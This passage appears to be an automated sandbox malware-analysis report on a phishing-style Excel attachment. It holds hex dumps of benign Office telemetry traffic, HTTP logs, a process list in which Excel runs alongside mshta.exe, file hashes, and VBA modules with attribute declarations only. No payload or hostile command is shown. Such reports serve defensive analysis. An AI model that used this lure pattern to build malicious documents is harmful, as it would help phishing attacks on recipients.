                            Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                            2025-03-24 08:33:32 UTC16384INData Raw: 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43
                            Data Ascii: S T="1" /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C
                            2025-03-24 08:33:32 UTC16384INData Raw: 20 20 20 3c 2f 41 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43
                            Data Ascii: </A> </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C
                            2025-03-24 08:33:32 UTC16384INData Raw: 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: "AND"> <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE">
                            2025-03-24 08:33:32 UTC16384INData Raw: 54 3d 22 55 33 32 22 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20
                            Data Ascii: T="U32" I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C>
                            2025-03-24 08:33:32 UTC16384INData Raw: 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32
                            Data Ascii: 1.0" encoding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e2
                            2025-03-24 08:33:32 UTC16384INData Raw: 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20
                            Data Ascii: ="2" E="TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S>
                            2025-03-24 08:33:32 UTC16384INData Raw: 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R>
                            2025-03-24 08:33:32 UTC | 16384 | IN
                            Data Ascii: </F> <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownExcep
                            2025-03-24 08:33:32 UTC | 16384 | IN
                            Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            2 | 192.168.2.9 | 49702 | 13.107.246.40 | 443 | 1896 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-24 08:33:37 UTC | 214 | OUT | GET /rules/rule120607v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                            Host: otelrules.svc.static.microsoft
                            2025-03-24 08:33:38 UTC | 491 | IN | HTTP/1.1 200 OK
                            Date: Mon, 24 Mar 2025 08:33:37 GMT
                            Content-Type: text/xml
                            Content-Length: 204
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                            ETag: "0x8DC582BB6C8527A"
                            x-ms-request-id: cb52e497-801e-0035-58da-9b752a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20250324T083337Z-17cccd5449bg7c4bhC1EWR84740000000a8g000000000x22
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2025-03-24 08:33:38 UTC | 204 | IN
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            3 | 192.168.2.9 | 49703 | 13.107.246.40 | 443 | 1896 | C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            2025-03-24 08:33:37 UTC | 214 | OUT | GET /rules/rule120603v8s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                            Host: otelrules.svc.static.microsoft
                            2025-03-24 08:33:38 UTC | 494 | IN | HTTP/1.1 200 OK
                            Date: Mon, 24 Mar 2025 08:33:38 GMT
                            Content-Type: text/xml
                            Content-Length: 2128
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                            ETag: "0x8DC582BA41F3C62"
                            x-ms-request-id: 0fe88ecf-101e-007a-32da-9b047e000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20250324T083338Z-17cccd5449bzw64jhC1EWRz2340000000a2g000000006vaz
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2025-03-24 08:33:38 UTC | 2128 | IN
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=



                            Target ID:0
                            Start time:04:32:21
                            Start date:24/03/2025
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Imagebase:0xb60000
                            File size:53'161'064 bytes
                            MD5 hash:4A871771235598812032C822E6F68F19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:11
                            Start time:04:33:17
                            Start date:24/03/2025
                            Path:C:\Windows\SysWOW64\mshta.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                            Imagebase:0xab0000
                            File size:13'312 bytes
                            MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:13
                            Start time:04:33:25
                            Start date:24/03/2025
                            Path:C:\Windows\splwow64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\splwow64.exe 12288
                            Imagebase:0x7ff76e080000
                            File size:163'840 bytes
                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:false

                            Target ID:16
                            Start time:04:33:43
                            Start date:24/03/2025
                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\ENQUIRY - RFQ 674441-76450.xla.xlsx"
                            Imagebase:0xb60000
                            File size:53'161'064 bytes
                            MD5 hash:4A871771235598812032C822E6F68F19
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Call Graph

                            callgraph 1 Error: Graph is empty

                            Module: Sheet1

                            Declaration
                            Attribute VB_Name = "Sheet1"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True

                            Module: Sheet2

                            Declaration
                            Attribute VB_Name = "Sheet2"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True

                            Module: Sheet3

                            Declaration
                            Attribute VB_Name = "Sheet3"
                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True

                            Module: ThisWorkbook

                            Declaration
                            Attribute VB_Name = "ThisWorkbook"
                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = False
                            Attribute VB_Customizable = True